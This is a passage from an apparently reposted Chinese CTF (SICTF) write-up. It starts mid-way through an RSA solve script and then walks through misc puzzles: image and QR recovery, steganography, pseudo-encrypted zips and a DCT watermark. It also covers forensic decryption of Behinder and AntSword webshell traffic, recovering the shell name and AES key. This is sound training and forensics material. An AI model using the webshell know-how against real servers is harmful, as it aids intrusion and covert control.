3173052044192907375974391257436211908641463947719594493311129179150043015816776680636855703407557636501711566215605658114055289137679940955
e = 19458216662993202562182929756256684791318810848802754020883513588583377528821730559897870095442161189229950925325157413999927847684731484753811988111830295294129447423655650029218971567158117911790213848402209470536199246476182240248742771389082526603384625792117047996128232952372477895218147279573573322975526303267821446640338606290250958710008158544852602338088244940388562828263436457418528981476220691508040085291576643321726669065360399003917048894093458055139757991688086912143763420958307099065105543361779847689716282373299487102518794317683805758527645283956734672229827240143254092779918701447288342107763
alpha = 8
root = 127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336
p = prePrime(libnum.nroot((n0//root),58))
print()
q = gen_num(p*alpha)
r = gen_num(q*alpha*2)
s = gen_num(r*alpha*4)

n = p**alpha * q**(alpha*2) * r**(alpha*4) * s**2

phi_n = (p**alpha - p**(alpha-1)) * (q**(alpha*2) - q**(alpha*2-1)) * (r**(alpha*4) - r**(alpha*4-1)) * (s**2 - s)
d = gmpy2.invert(e,phi_n)
m = pow(c,d,n)
print(libnum.n2s(int(m)))

后经提醒,因为p>m,也可以直接mod p

MISC

签到打卡完成

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nGzxhRTG-1674185779352)(null)]

颜色有点淡,可以用ps拉对比度

也可以提取(239,239,239)的颜色

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pTupE8Mo-1674185779387)(null)]

不好扫可以用CQR扫完再生成一个

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SLYi0FMy-1674185779255)(null)]

发送SICTF获得flag

color

在这里插入图片描述

一张混淆的图片,能看出二维码的痕迹

![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mwnoiTLa-1674185779732)(null)](https://img-blog.csdnimg.cn/b4f227e5d22440f8b26db518471f8289.png)

文件尾有额外数据,是压缩包 补上PK头解压得到加密脚本

from PIL import Image
import random
flag = Image.open("flag.png")
flag = flag.convert("RGB")
new = Image.new("RGB",flag.size)
h=flag.height
w=flag.width
num=[0,128,255]
for i in range(h):
    for k in range(w):
        r,g,b = flag.getpixel((i,k))
        if r == 0 and g == 0 and b ==0:
            new.putpixel((i,k),((random.choice(num),random.choice(num),random.choice(num))))
        else:
            new.putpixel((i,k),(random.randint(0,255),random.randint(0,255),random.randint(0,255)))
new.save('save.png')

这个脚本,把黑色像素替换的rgb替换为0 128 255中的随机值

白色的rgb替换为0-255中的随机值

反向写一个脚本

from PIL import Image
load = Image.open('save.png')
flag = Image.new('RGB',load.size)
h=flag.height
w=flag.width
for i in range(h):
    for k in range(w):
        r,g,b = load.getpixel((i,k))
        if (r == 0 or r==128 or r == 255) and (g == 0 or g==128 or g == 255) and (b == 0 or b==128 or b == 255):
            flag.putpixel((i,k),(0,0,0))
        else:
            flag.putpixel((i,k),(255,255,255))

#flag.show()
flag.save('flag.png')

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vqkIS4Ah-1674185779180)(null)]

扫码得到flag

geek_challenge

交互计算题

![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xbfZNReO-1674185779316)(null)](https://img-blog.csdnimg.cn/a3c200a9fbd34bb886a0af7da39acfa3.png)

写pwntools交互脚本,解5000次就很不理解,对服务器不友好

from pwn import *

context.log_level = ('debug')
r = remote('ctf.qsnctf.com',10840)
r.recvuntil(b'\n\n')
i = 0
while True:

    calc = r.recvline(b'= ?')[:-4]
    r.sendlineafter('answer:',str(eval(calc)))
    if r.recvline()==b'Good job!\n':
        continue


print(i)
r.interactive()

hacker

蚁剑流量

tcp20流 追踪HTTP

去掉前九位解base64 可以得到

U2FsdGVkX19bEN3D8vFeG39VyYXPwle2mMQLh5T1HYiSI1XCx7rJhsDnp9qLpUQB
yITd05Uu05ZAv0o=e264c55be
/tmp
a7eb3df874e

U2FsdGVkX19是Salted__ 一般是网站加盐的AES DES TriDES RABBIT RC4

需要key,前面流可以经常见到一个文件夹

`cd /var/tmp/password1sGui_1s_shumu

解rabbit得到flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EDv5sjaH-1674185779077)(null)]

hacker2

大黑客树木再次上传了shell并用工具进行连接,他在上传目录的一堆测试txt中找到了重要的字符串,我们观察并截取了流量
你能告诉我们他上传的shell的名称和key值以及最终找到的重要字符串吗?
flag格式:SICTF{shell名称_密钥_文本文件中存储的字符串}

TCP第0流就可以看到 冰蝎马的特征

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CCjSXYn9-1674185779218)(null)]

key是7d7c23e87b47368b

TCP第13流可以看到she1l.php

顺便讲一下这一流中写的是冰蝎控制端与被控端进行认证的流量

如何就是慢慢看流量

TCP46流追踪HTTP可以找到

uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA==

冰蝎AES的方式是CBCmode IV为16个\x00

用脚本解密

from base64 import b64decode
from Crypto.Cipher import AES


def aes_def(key,input_text):
    # 非保留模式
    if b"==" not in input_text:
        input_text = input_text + b"=="
    input_text = b64decode(input_text)
    mode = AES.MODE_CBC
    iv = b'\0' * 16
    cryptos = AES.new(key, mode, iv)
    plain_text = cryptos.decrypt(input_text).decode('utf-8', 'ignore')
    return plain_text


key=b"7d7c23e87b47368b"
message = b'uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA=='
decode_message =  aes_def(key,message)
print(decode_message)

得到

{"status":"c3VjY2Vzcw==","msg":"YzByUmVjdCEhIQ=="}

msg解码得到 c0rRect!!!

拼起来得到flag

SICTF{she1l_7d7c23e87b47368b_c0rRect!!!}

ezmisc

二血 这题难度还行,最少解的题,我和一血都是非预期

解压的时候,flag.zip是伪加密,修改两个09为00后可以解压

f1ag.png

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LevhOFJf-1674185779663)(null)\

这是一只流浪的flag留给我们的秘密:我需要一个中文拼音全拼。

肯定不是泷奈,

看看secret.txt里面

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Rl9f8Gz8-1674185779115)(null)]

尝试倒序解base64

发现是三个数字,联想为rgb,一共有268780行,刚好和f1ag的分辨率对应

写脚本转为图片,颜色是rgb还是bgr不影响解题(非预期)

from PIL import Image
import base64

secret = open('secret~.txt','r').readlines()[:-2:]

f1ag = Image.open('f1ag.png')
print(f1ag.size)
secret_img = Image.new('RGB',f1ag.size)

h=f1ag.height
w=f1ag.width

for i in range(w):
    for k in range(h):
        now_index = (i*h)+k
        decode_base = [int(base64.b64decode(x).decode()) for x in (secret[now_index][::-1].split()[::-1])]
        # rgb还是bgr不影响解题
        r,g,b = r,g,b = decode_base[0],decode_base[1],decode_base[2]
        
        secret_img.putpixel((i,k),(r,g,b))


# secret_img.show()
secret_img.save('wtf2.png')

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qphrfw1y-1674185779486)(null)]

其实已经可以看出来六花了

拿这个图和f1ag异或

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-D23bKhjp-1674185779768)(null)\

小鸟游六花,我甚至把原图都找出来了 pid 93430703
在这里插入图片描述

f1agpng文件尾有oursecret的隐写特征

oursecret解f1ag.png 密码xiaoniaoyouliuhua

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FOtxXAQS-1674185779866)(null)]

得到flag.txt

没用到Xkey和attachment.7z,非预期了
在这里插入图片描述

其实xkey解XXencode是7z的密码,里面是个混淆的加密脚本

王八树木

打开树木

一眼jpg倒序,反过来文件尾有个加密zip

爆破得到密码123456

得到密码SI!!!!!!

jpg解silentEye

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dAOHvGtK-1674185779627)(null)]

得到猫脸变换的参数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RpkbYlE9-1674185779523)(null)]

脚本还原

import cv2
import numpy as np
import matplotlib.image as mpimg

def de_arnold(img,shuffle_time,a,b):
    r, c, d = img.shape
    dp = np.zeros(img.shape, np.uint8)

    for s in range(shuffle_time):
        for i in range(r):
            for j in range(c):
                x = ((a * b + 1) * i - b * j) % r
                y = (-a * i + j) % c
                dp[x, y, :] = img[i, j, :]
        img = np.copy(dp)
    return img

img = mpimg.imread('flag.bmp')
img = img[:, :, ::-1]
new = de_arnold(img, 2, 1, 2)
cv2.imshow('picture', new)
cv2.waitKey(0)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-npR4YrUI-1674185779592)(null)]

Revenge

zip是伪加密

uncompyle6反编译pyc得到加密脚本

# uncompyle6 version 3.8.0
# Python bytecode 3.7.0 (3394)
# Decompiled from: Python 3.8.10 (default, Nov 14 2022, 12:59:47) 
# [GCC 9.4.0]
# Embedded file name: encode.py
# Compiled at: 2023-01-17 14:47:26
# Size of source mod 2**32: 439 bytes
import secret
import cv2
import numpy as np
from random import randint
Hg = np.float32(cv2.imread('flag.png', 1))
for i in range(64):
    for j in range(64):
        Si = randint(0, 2)
        Fe = Hg[:, :, Si]
        Mg = cv2.dct(Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8])
        if secret[(i * 64 + j)] == '1':
            Mg[(7, 7)] = 20
        else:
            if secret[(i * 64 + j)] == '0':
                Mg[(7, 7)] = -20
        Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8] = cv2.idct(Mg)
        Hg[:, :, Si] = Fe

cv2.imwrite('flag.png', Hg)
# okay decompiling key.pyc

8x8 dct 分块变换

secret是0和1组成的

Si是0-2的随机数,爆破一下

import cv2
import numpy as np
from random import randint

# read the original image
Hg = np.float32(cv2.imread('../flag.png', 1))

# create an empty list to store the hidden information
secret = []

# iterate through each 8x8 block
for i in range(64):
    for j in range(64):
        for Si in range(3):
            Fe = Hg[:, :, Si]
            Mg = cv2.dct(Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8])
            if Mg[(7, 7)] > 10:
                secret.append('1')
            elif Mg[(7, 7)] < -10 :
                secret.append('0')

# print the recovered secret message
print(''.join(secret))

得到

0100101001110000001100100100101001000100010001000110101101101101010100010011000101010010011100110101000100111001011001100110101000110110001100110111000001110100011000010101100001000001010100110110001001000111011001010100101000110101011101010111000100110010010101010110001101100101010101110100110001100101010100110100001001111000010001100101011101000110010101010101100000110111011010000110001101010111001100100110001001101010010100100110110101000111010100100110111001001011010101000011100101110001010011100110011001100100010001110100110000110010011100100011100001110011001110000110110101101011010100010110111101000110010001100110010101010110001101000101101001111000001100100100011101000010010100100101010101010101011000110101011001101001011010110101001001100101010101100111010101011010011011110011100100110111010101010100011001011001011001110101001100110001010100100011010101000110010000110101001101100010011001010110101001000101011011110100001101110111010100010111011101000110010000110101100101110111010101000100101101101011001101110101001100110110011101010101101001101001010110100110100101100110010000100011001001000001011000100100100001110000011001010101101001110110010000010111100101000010010011010100101001100111010101000110101001001011010100110111011101110010011110100101001001110010011100100011001100110011001100100111010001100001001110000110010101100100001101010111100001000111010000100110100000110101010011100110001001110010010101010111100001100011011101110100001001001011010110000101011101100010011010000100110101000011011110100101101000110010010001000111000101110100010000010011000101110100011000110111100101001010011011100011011101000001011101010111101001000110010010110100100000111001011001110110110101101111010011100100001001101010010010100111001101111001011000100100010100110100011010100100101000110101011100100111010101001100010000010100001001000010001100100100110001101111010010100111011100110110011101110110010100110001010010000110000101010101011010000110101101010010010011010110101100110010001101000110001001000101011101000011001001110011011011110101010101110011011010000101010101100111010101000101010101010100010001010100110101010100011010010100110100111001001100100011001101101001011100110101010101110101011011100100101000110011010100010110100001100100010011100011100101001100011000110100111000110100001101110011011001101011010000110110010001110011010001110011001001000001011100010110010101110111011110000111100001011010010001000110000101010101010001010111001101010011011000100011011100110100011001110101100101010000001100110111000000111001001101000011010001110000010100000110100001110110010011000111001001101111010011000011100001101000011010100101011001101111010010000111011101000100011110100110001001000011011000110101010101011001010000110011001001101000010110100011001101110000001100100111011101101110010110100101001101100011011011100101101001100100011110000011001100110001011010100101000101000101011100100011011001001011011110000110111101100101001100100110001001101010011000010111001001110011001101110111000001000001011100110100100001101001011100000100110101000010001101010110000101100010001100010100000101110100011100010110100101100110001100100111100001001100010001000100101100110011010001000101001100110101011100010110100001000100010000010101000001001010010011000100101001101111011110100100110001101011011110010100010101011000011101110110111001010011001100110110010101110011010100010110010101001100011000010100001001001010010101010100011001101101011100100100011101011001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

去掉最后补全用的0,

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oGCnQ6Sr-1674185779450)(null)]

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/173979.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Registration Center

Registration Center

CAP●一致性(Consistency)&#xff1a;所有节点在同一时间具有相同的数据&#xff1b;●可用性(Availability) &#xff1a;保证每个请求不管成功或者失败都有响应&#xff1b;某个系统的某个节点挂了&#xff0c;但是并不影响系统的接受或者发出请求。●分隔容忍(Partition to…
阅读更多...
python循环语句

python循环语句

Python循环语句 文章目录Python循环语句一、实验目的二、实验原理三、实验环境四、实验内容五、实验步骤1.While循环结构2.While无限循环3.For循环语法4.break语句和continue语句一、实验目的 掌握循环结构的语法 二、实验原理 Python中的循环语句有 for 和 while。 Python…
阅读更多...
AcWing蓝桥杯AB组辅导课07、贪心

AcWing蓝桥杯AB组辅导课07、贪心

文章目录前言一、贪心模板题例题1&#xff1a;AcWing 104. 货仓选址&#xff08;贪心&#xff0c;简单&#xff0c;算法竞赛进阶指南&#xff09;分析题解&#xff1a;贪心思路例题例题1&#xff1a;AcWing 1055. 股票买卖 II&#xff08;贪心、状态机&#xff0c;简单&#xf…
阅读更多...
[ESP][驱动]GT911 ESP系列驱动

[ESP][驱动]GT911 ESP系列驱动

GT911ForESP GT911在ESP系列上的驱动&#xff0c;基于IDF5.0&#xff0c;ESP32S3编写 本库使用面向对象思想编写&#xff0c;可创建多设备多实例 Github&#xff0c;Gitee同步更新&#xff0c;Gitee仅作为下载仓库&#xff0c;提交Issue和Pull request请到Github Github: h…
阅读更多...
具体芯片的I2C_Adapter驱动分析

具体芯片的I2C_Adapter驱动分析

具体芯片的I2C_Adapter驱动分析 文章目录具体芯片的I2C_Adapter驱动分析参考资料&#xff1a;一、 I2C控制器内部结构1.1 通用的简化结构1.2 IMX6ULL的I2C控制器内部结构二、 I2C控制器操作方法三、 分析代码3.1 设备树3.2 驱动程序分析致谢参考资料&#xff1a; Linux内核真正…
阅读更多...
03_筛选标记2.0版和3.0版FIND及ColorIndex

03_筛选标记2.0版和3.0版FIND及ColorIndex

文章目录2.0版工作簿筛选标记筛选sheet标记取消筛选标记3.0版ColorIndex 下标代码特别鸣谢,大佬的分享FIND方法的使用2.0版 工作簿筛选标记 Option Explicit Sub 自动筛选()Dim Town As StringDim wsh As WorksheetCall 初始化 初始化表格状态Town InputBox("请输入街…
阅读更多...
SLAM笔记——turtlebot传感器ekf实验实验

SLAM笔记——turtlebot传感器ekf实验实验

这里写目录标题实验内容实验准备msg数据类型给uwb和odom增加噪声robot_pose_ekf发布路径实验结果实验内容 本实验将在gazebo仿真环境中使用ekf进行传感器数据融合。本文使用turtlebot3进行实验&#xff0c;turtlebot本身会发布odom和imu。imu的误差可以在urdf文件中进行调整&a…
阅读更多...
追梦之旅【数据结构篇】——对数据结构的认知 + 初识时间复杂度和空间复杂度~

追梦之旅【数据结构篇】——对数据结构的认知 + 初识时间复杂度和空间复杂度~

详解C语言函数模块知识(下篇&#xff09;&#x1f60e;前言&#x1f64c;浅谈数据结构~&#x1f64c;1、什么是数据结构&#xff1f;(ˇˍˇ) 想&#xff5e;2、什么是算法&#xff1f;ˇˍˇ) 想&#xff5e;3、数据结构和算法的重要性&#x1f60a;4、如何才能学好数据结构呢…
阅读更多...
初识 NodeJS(基于 Chrome V8 引擎的 JavaScript 运行时环境)

初识 NodeJS(基于 Chrome V8 引擎的 JavaScript 运行时环境)

初识 NodeJS&#xff08;基于 Chrome V8 引擎的 JavaScript 运行时环境&#xff09;参考描述NodeJSNodeJS 可以做什么&#xff1f;特点用武之地获取检测运行JavaScript 运行时环境JavsScript 引擎浏览器中的 JavaScript 运行时环境Chrome 浏览器运行时环境NodeJS 中的 JavaScri…
阅读更多...
【着色器实现海面效果_菲尼尔/Unlit/Transparent】

【着色器实现海面效果_菲尼尔/Unlit/Transparent】

1.水体颜色 2.反射,水面波纹流动 3.折射、水底、水底透明度和折射 4.焦散,在水底接近岸边的水域 5.岸边泡沫,水花接近岸边的泡沫 6.水体运动,顶点动画 用灯光模式是Light Model :Unilt Render Type:Transparent 获取水面深度 利用这个节点,从深度图获取世界空间的位…
阅读更多...
如何做流程图?这几个实用的制作流程图方法分享给你

如何做流程图?这几个实用的制作流程图方法分享给你

说到流程图的制作&#xff0c;相信大家都并不陌生&#xff0c;在日常的工作和学习中&#xff0c;我们都会根据需求接触到各种各样的流程图&#xff0c;有时还要自己动手绘制流程图并使用&#xff0c;但你是否会因为不会绘制流程图而感到苦恼呢&#xff1f;没关系&#xff0c;今…
阅读更多...
vue中利用ref实现更灵活的子向父传值

vue中利用ref实现更灵活的子向父传值

目录前言一&#xff0c;基础代码二&#xff0c;层次递进的讲解用法2.1 给子组件设置ref2.2 自定义事件2.3 给子组件设置一个自定义事件三&#xff0c;灵活性四&#xff0c;注意后记前言 目前我们熟知的子向父传值有两种方式&#xff1a; 一种是在父组件中定义函数&#xff0c;…
阅读更多...
【AI】Windows配置GPU Cuda驱动和Pytorch框架

【AI】Windows配置GPU Cuda驱动和Pytorch框架

目录 1、Cuda驱动安装 1.1 查看显卡硬件 1.2 查看cuda版本 2、Annaconda python环境准备 2.1 创建pytorch_gpu 2.2 查看python版本 3、Pytorch和torchVsion软件安装 4、验证测试 在进行AI项目开发的时候&#xff0c;经常要在GPU环境中运行代码&#xff0c;对于没有配置…
阅读更多...
动手深度学习-pytorch线性代数

动手深度学习-pytorch线性代数

标量简单操作长度向量简单操作长度其他操作矩阵简单操作乘法&#xff08;矩阵*向量&#xff09;乘法&#xff08;矩阵*矩阵&#xff09;范数取决于如何衡量b和c的长度常见范数矩阵范数&#xff1a;最小的满足的上面公式的值Frobenius范数特殊矩阵对称和反对称正定正交矩阵置换矩…
阅读更多...
Solidity 中的数学(第 4 部分:复利)

Solidity 中的数学(第 4 部分:复利)

本文是关于在 Solidity 中进行数学运算的系列文章中的第四篇。这次的主题是&#xff1a;复利。 介绍 在我们之前的文章中&#xff0c;我们讨论了百分比以及它们是如何在 Solidity 中计算的。在金融数学中&#xff0c;百分比通常与贷款和存款支付的利息有关。在每个时间段结束时…
阅读更多...
深度学习入门基础CNN系列——批归一化(Batch Normalization)和丢弃法(dropout)

深度学习入门基础CNN系列——批归一化(Batch Normalization)和丢弃法(dropout)

想要入门深度学习的小伙伴们&#xff0c;可以了解下本博主的其它基础内容&#xff1a; &#x1f3e0;我的个人主页 &#x1f680;深度学习入门基础CNN系列——卷积计算 &#x1f31f;深度学习入门基础CNN系列——填充&#xff08;padding&#xff09;与步幅&#xff08;stride&…
阅读更多...
CSS 搜索框

CSS 搜索框

CSS 搜索框 <!DOCTYPE html> <html><head><meta charset"utf-8"><title>搜索框</title><style type"text/css">* {margin: 0;padding: 0;}.search-container {margin: 50px;display: flex;width: 500px;height:…
阅读更多...
rtthread pwm

rtthread pwm

1、配置PWM设备驱动相关宏定义 1.1 配置PWM和TIM设备驱动 在RT-Thread Settings 配置界面中&#xff0c;在设备驱动程序目录下勾选 HWTIMER 和 PWM设备驱动程序&#xff0c;如下图所示&#xff1a; 配置完后在 rtconfig.h 中可以查看刚刚配置的 RT_USING_HWTIMER 和 RT_U…
阅读更多...
Ribbon策略改变实现步骤(基于Eureka服务注册中心)

Ribbon策略改变实现步骤(基于Eureka服务注册中心)

前言 Ribbon作为服务调用的作用&#xff0c;自带的默认负载均衡机制是轮询机制也就是轮流访问机制。当然有时候并不是业务上都需要这种机制&#xff0c;这时候就需要改变。 机制类型 RoundRobinRule 轮询 RandomRule 随机 RetryRule 先进行轮询策略获取服务&#xff0c;如…
阅读更多...
本地怎么画最简单的监控图

本地怎么画最简单的监控图

当我们需要监测程序是否正常运行&#xff0c;或者需要观测程序运行是否平稳&#xff0c;或者需要知道特定场景下指标的状态时&#xff0c;那我们都需要将监控可视化。今天我简单记录下&#xff0c;本地是如何监控可视化~ 目录简单调试阶段——仅使用prometheus1.安装promethues…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023